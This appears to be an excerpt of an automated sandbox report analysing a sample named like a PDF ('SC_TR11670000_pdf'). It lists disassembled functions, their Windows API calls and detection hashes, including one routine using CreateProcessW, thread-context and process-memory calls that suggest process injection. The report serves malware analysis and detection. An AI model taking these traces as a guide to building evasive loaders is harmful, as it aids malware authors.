                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: IconNotifyShell_$_memset
                                                                          • String ID:
                                                                          • API String ID: 1505330794-0
                                                                          • Opcode ID: d294c9fc318853a644162f26fb95a83ef57e702c37e9827e342578e1574dfde1
                                                                          • Instruction ID: f00d505dd7d1d95b93f39c05f2b41e88216b8485db7fa4b8942f5dfe9ce3f740
                                                                          • Opcode Fuzzy Hash: d294c9fc318853a644162f26fb95a83ef57e702c37e9827e342578e1574dfde1
                                                                          • Instruction Fuzzy Hash: 963171B06057418FD721DF25D88579BBBF8FB49304F04092EF59A83291EBB5A944CB92
                                                                          Function 00B0594C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __FF_MSGBANNER.LIBCMT ref: 00B05963
                                                                            • Part of subcall function 00B0A3AB: __NMSG_WRITE.LIBCMT ref: 00B0A3D2
                                                                            • Part of subcall function 00B0A3AB: __NMSG_WRITE.LIBCMT ref: 00B0A3DC
                                                                          • __NMSG_WRITE.LIBCMT ref: 00B0596A
                                                                            • Part of subcall function 00B0A408: GetModuleFileNameW.KERNEL32(00000000,00BA43BA,00000104,?,00000001,00000000), ref: 00B0A49A
                                                                            • Part of subcall function 00B0A408: ___crtMessageBoxW.LIBCMT ref: 00B0A548
                                                                            • Part of subcall function 00B032DF: ___crtCorExitProcess.LIBCMT ref: 00B032E5
                                                                            • Part of subcall function 00B032DF: ExitProcess.KERNEL32 ref: 00B032EE
                                                                            • Part of subcall function 00B08D68: __getptd_noexit.LIBCMT ref: 00B08D68
                                                                          • RtlAllocateHeap.NTDLL(01050000,00000000,00000001,00000000,?,?,?,00B01013,?), ref: 00B0598F
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                          • String ID:
                                                                          • API String ID: 1372826849-0
                                                                          • Opcode ID: 5c86b3daef0f98fcd50b2782eadf7ea490607570d7502fc431815289ae177105
                                                                          • Instruction ID: f15a6ed3be977e3dfcfc1aa71916e63d1456896a6cddcf97c6fcfa5a1ee86e07
                                                                          • Opcode Fuzzy Hash: 5c86b3daef0f98fcd50b2782eadf7ea490607570d7502fc431815289ae177105
                                                                          • Instruction Fuzzy Hash: 8A01B535200B15EEE6352B64EC46B7F7EC8DF92B70F1002BAF541AB5D1DEB09D019A64
                                                                          Function 00B49B2C Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00B497D2,?,?,?,?,?,00000004), ref: 00B49B45
                                                                          • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00B497D2,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00B49B5B
                                                                          • CloseHandle.KERNEL32(00000000,?,00B497D2,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00B49B62
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: File$CloseCreateHandleTime
                                                                          • String ID:
                                                                          • API String ID: 3397143404-0
                                                                          • Opcode ID: fcc10253b81fc6af7f5bcbce69c9fe42f92052986624d7445c1cb93fee337bd9
                                                                          • Instruction ID: 75e87daaec57db002d64890e33ac96aef9939c36845a9e51273e119d574d3e0b
                                                                          • Opcode Fuzzy Hash: fcc10253b81fc6af7f5bcbce69c9fe42f92052986624d7445c1cb93fee337bd9
                                                                          • Instruction Fuzzy Hash: B0E08632181215B7D7211B54FC09FDA7B58EB067A1F104120FB547A0E08BF52A119798
                                                                          Function 00B48F97 Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _free.LIBCMT ref: 00B48FA5
                                                                            • Part of subcall function 00B02F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00B09C64), ref: 00B02FA9
                                                                            • Part of subcall function 00B02F95: GetLastError.KERNEL32(00000000,?,00B09C64), ref: 00B02FBB
                                                                          • _free.LIBCMT ref: 00B48FB6
                                                                          • _free.LIBCMT ref: 00B48FC8
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                          • String ID:
                                                                          • API String ID: 776569668-0
                                                                          • Opcode ID: 180ac2cc07007adee99720b26c657bf09b4177bae862674a470a9d0e5fc62c6e
                                                                          • Instruction ID: fda0399ba627250473bd4eb6ce9f83f7fed11a028c85b11cedc8957baa952b4c
                                                                          • Opcode Fuzzy Hash: 180ac2cc07007adee99720b26c657bf09b4177bae862674a470a9d0e5fc62c6e
                                                                          • Instruction Fuzzy Hash: B1E02BB170C7024BCA20A738AD05E871BFE9F48390B080C8DB409DB1C2DF20FD489034
                                                                          Function 00AEAB23 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: CALL
                                                                          • API String ID: 0-4196123274
                                                                          • Opcode ID: 6e766268e4aa8111b4361db85993ce007d79fbbeb32e9071965a10141310a700
                                                                          • Instruction ID: 61b36e7055948c7cfdb6b81775b51d36e27bf9f06c7578f83ac31e32fe36b451
                                                                          • Opcode Fuzzy Hash: 6e766268e4aa8111b4361db85993ce007d79fbbeb32e9071965a10141310a700
                                                                          • Instruction Fuzzy Hash: 6A2237705182919FC724DF15C594B6ABBF1FF94300F1489ADE89A8B362DB31ED85CB82
                                                                          Function 00AE4DD0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove
                                                                          • String ID: EA06
                                                                          • API String ID: 4104443479-3962188686
                                                                          • Opcode ID: 31c1232ab686c25e6e21d216ee485664a4248fb2f7aff12728b73918e8de3671
                                                                          • Instruction ID: c37a40dcd93f50fac120847e05d0c5fc9ecb743979cf7f154791b8ad301dfa3e
                                                                          • Opcode Fuzzy Hash: 31c1232ab686c25e6e21d216ee485664a4248fb2f7aff12728b73918e8de3671
                                                                          • Instruction Fuzzy Hash: 69416D32A041D45BCF255F6699517FE7FBEEF0D300F6844B5F882AB282C6219D8483E1
                                                                          Function 00AE492E Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • IsThemeActive.UXTHEME ref: 00AE4992
                                                                            • Part of subcall function 00B035AC: __lock.LIBCMT ref: 00B035B2
                                                                            • Part of subcall function 00B035AC: DecodePointer.KERNEL32(00000001,?,00AE49A7,00B381BC), ref: 00B035BE
                                                                            • Part of subcall function 00B035AC: EncodePointer.KERNEL32(?,?,00AE49A7,00B381BC), ref: 00B035C9
                                                                            • Part of subcall function 00AE4A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00AE4A73
                                                                            • Part of subcall function 00AE4A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00AE4A88
                                                                            • Part of subcall function 00AE3B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00AE3B7A
                                                                            • Part of subcall function 00AE3B4C: IsDebuggerPresent.KERNEL32 ref: 00AE3B8C
                                                                            • Part of subcall function 00AE3B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,00BA62F8,00BA62E0,?,?), ref: 00AE3BFD
                                                                            • Part of subcall function 00AE3B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 00AE3C81
                                                                          • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00AE49D2
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                                          • String ID:
                                                                          • API String ID: 1438897964-0
                                                                          • Opcode ID: da0c36b01251602c09c71499d6d1ea18ffaea3e5aa412e6f3222a867c3be5b15
                                                                          • Instruction ID: 9b8c58bd33db170d64dedd1cccec2bacfaa1fc8419e22084c9078ce7ea5b1815
                                                                          • Opcode Fuzzy Hash: da0c36b01251602c09c71499d6d1ea18ffaea3e5aa412e6f3222a867c3be5b15
                                                                          • Instruction Fuzzy Hash: 18118CB19083519BC700EF2AED0691ABFE8EF99750F00452EF055972B1DFB09945CB92
                                                                          Function 00AE5DF9 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,00AE5981,?,?,?,?), ref: 00AE5E27
                                                                          • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,00AE5981,?,?,?,?), ref: 00B1E19C
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: CreateFile
                                                                          • String ID:
                                                                          • API String ID: 823142352-0
                                                                          • Opcode ID: 1bc6978e9dbdc7f02abf5a806b070db22816c0cbdf13ad30e5b063445d487266
                                                                          • Instruction ID: c50c749adff7dcb7c2bbe9bdbd97d9c973f5b15d1719cdd9297c0e59a9558247
                                                                          • Opcode Fuzzy Hash: 1bc6978e9dbdc7f02abf5a806b070db22816c0cbdf13ad30e5b063445d487266
                                                                          • Instruction Fuzzy Hash: 95018070644648BEF3240E29EC8AF663ADCEB0176CF148318BAE56A1E0C6B45E458B50
                                                                          Function 00B00FF6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00B0594C: __FF_MSGBANNER.LIBCMT ref: 00B05963
                                                                            • Part of subcall function 00B0594C: __NMSG_WRITE.LIBCMT ref: 00B0596A
                                                                            • Part of subcall function 00B0594C: RtlAllocateHeap.NTDLL(01050000,00000000,00000001,00000000,?,?,?,00B01013,?), ref: 00B0598F
                                                                          • std::exception::exception.LIBCMT ref: 00B0102C
                                                                          • __CxxThrowException@8.LIBCMT ref: 00B01041
                                                                            • Part of subcall function 00B087DB: RaiseException.KERNEL32(?,?,?,00B9BAF8,00000000,?,?,?,?,00B01046,?,00B9BAF8,?,00000001), ref: 00B08830
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                          • String ID:
                                                                          • API String ID: 3902256705-0
                                                                          • Opcode ID: 3e9d195dd0f1c06fea083cd418d4688b38dc6351416f6f6176e2f076ce7de339
                                                                          • Instruction ID: d51b021e6437e6b416d6ddb8c76de67476d6be99249ab5e7b4cf40b8cf582795
                                                                          • Opcode Fuzzy Hash: 3e9d195dd0f1c06fea083cd418d4688b38dc6351416f6f6176e2f076ce7de339
                                                                          • Instruction Fuzzy Hash: 3EF08135500219A6CB25AB58ED069DF7FECDF00360F1044E5F898966E1EFB19A809691
                                                                          Function 00B0582D Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: __lock_file_memset
                                                                          • String ID:
                                                                          • API String ID: 26237723-0
                                                                          • Opcode ID: 59aca6475a3d52599fe88dabf66e2a3342f56b387437eb3b69129e022383f927
                                                                          • Instruction ID: fbb8bdbf8ceff23ce54c4f0da48b4784586d6401043e48bc972a6364b3ca3c37
                                                                          • Opcode Fuzzy Hash: 59aca6475a3d52599fe88dabf66e2a3342f56b387437eb3b69129e022383f927
                                                                          • Instruction Fuzzy Hash: 78017171800B09EBCF22AF698C0599F7FE5AF40360F14C2A5B8145A1E1EB31CA21DF91
                                                                          Function 00B055D6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00B08D68: __getptd_noexit.LIBCMT ref: 00B08D68
                                                                          • __lock_file.LIBCMT ref: 00B0561B
                                                                            • Part of subcall function 00B06E4E: __lock.LIBCMT ref: 00B06E71
                                                                          • __fclose_nolock.LIBCMT ref: 00B05626
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                          • String ID:
                                                                          • API String ID: 2800547568-0
                                                                          • Opcode ID: f3dae88c46c6c9847b8ccfe0fe856e16854a96839cfb3f86bd2e0e47dcb7925d
                                                                          • Instruction ID: dcfa9fe024553dc70d0dcefb75957943bcd486d5e07cb922e0b1a38919cb04ca
                                                                          • Opcode Fuzzy Hash: f3dae88c46c6c9847b8ccfe0fe856e16854a96839cfb3f86bd2e0e47dcb7925d
                                                                          • Instruction Fuzzy Hash: F0F09A71801A059ADB30AF798802B6F7FE1AF40334F6582C9A465AB5C2CF7D8A019F65
                                                                          Function 00AE81C1 Relevance: 2.6, APIs: 2, Instructions: 54COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,?,?,?,00AE558F,?,?,?,?,?), ref: 00AE81DA
                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,?,?,?,00AE558F,?,?,?,?,?), ref: 00AE820D
                                                                            • Part of subcall function 00AE78AD: _memmove.LIBCMT ref: 00AE78E9
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: ByteCharMultiWide$_memmove
                                                                          • String ID:
                                                                          • API String ID: 3033907384-0
                                                                          • Opcode ID: 7b6468ba62cf5837bb458087c7f94bf6925e00c5edefc3339f33920f19ef401f
                                                                          • Instruction ID: 568cfc495b4a344f44e3af489cae945739022861ad02e2d2cd8ed0139e1e58ff
                                                                          • Opcode Fuzzy Hash: 7b6468ba62cf5837bb458087c7f94bf6925e00c5edefc3339f33920f19ef401f
                                                                          • Instruction Fuzzy Hash: D4018B31201544BEEB246B26ED4AF7B3FACEB8A760F10802AFA05DE1D0DE7098009661
                                                                          Function 01C5129D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateProcessW.KERNELBASE(?,00000000), ref: 01C51A5B
                                                                          • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01C51AF1
                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01C51B13
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1752233617.0000000001C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01C50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_1c50000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                          • String ID:
                                                                          • API String ID: 2438371351-0
                                                                          • Opcode ID: 47f45bba1b7d6f78db91ee930b61901a72fbf3bd75938062ef2b5451d70cd9db
                                                                          • Instruction ID: 6cb7482b05df4642b518befdf6af70dffec887d69d25c7d33b94d64c82c9e604
                                                                          • Opcode Fuzzy Hash: 47f45bba1b7d6f78db91ee930b61901a72fbf3bd75938062ef2b5451d70cd9db
                                                                          • Instruction Fuzzy Hash: 0A12CE24E24658C6EB24DF64D8547DEB232FF68300F1090E9910DEB7A5E77A4F81CB5A
                                                                          Function 00AF2123 Relevance: 1.7, APIs: 1, Instructions: 171COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b1f9c8d882bde5bd5349857b9acb3a298cef5b6ffaa9239d86839812ed071f13
                                                                          • Instruction ID: c483947139111f626f210485b6e0f9211935dcaf34eb5cae71a135399027a032
                                                                          • Opcode Fuzzy Hash: b1f9c8d882bde5bd5349857b9acb3a298cef5b6ffaa9239d86839812ed071f13
                                                                          • Instruction Fuzzy Hash: 2E518335600614AFCF14EB68DA91FBE77E5AF49314F1481A8F90AAB392DB30ED00CB55
                                                                          Function 00AE5C4E Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00AE5CF6
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: FilePointer
                                                                          • String ID:
                                                                          • API String ID: 973152223-0
                                                                          • Opcode ID: 1263c85e79c9483b2a9f5f46fb93f29fb63a8676dae0506d796dc79645bab6b0
                                                                          • Instruction ID: 0ec67e3cc9209c739ad9376c5f6e78263ff49140456cca71ec6094e4fbb9a4ba
                                                                          • Opcode Fuzzy Hash: 1263c85e79c9483b2a9f5f46fb93f29fb63a8676dae0506d796dc79645bab6b0
                                                                          • Instruction Fuzzy Hash: B4316D31E00B49AFCB18CF2ED9946ADB7B5FF88314F248629D81993710D771B960DB90
                                                                          Function 00B200D6 Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
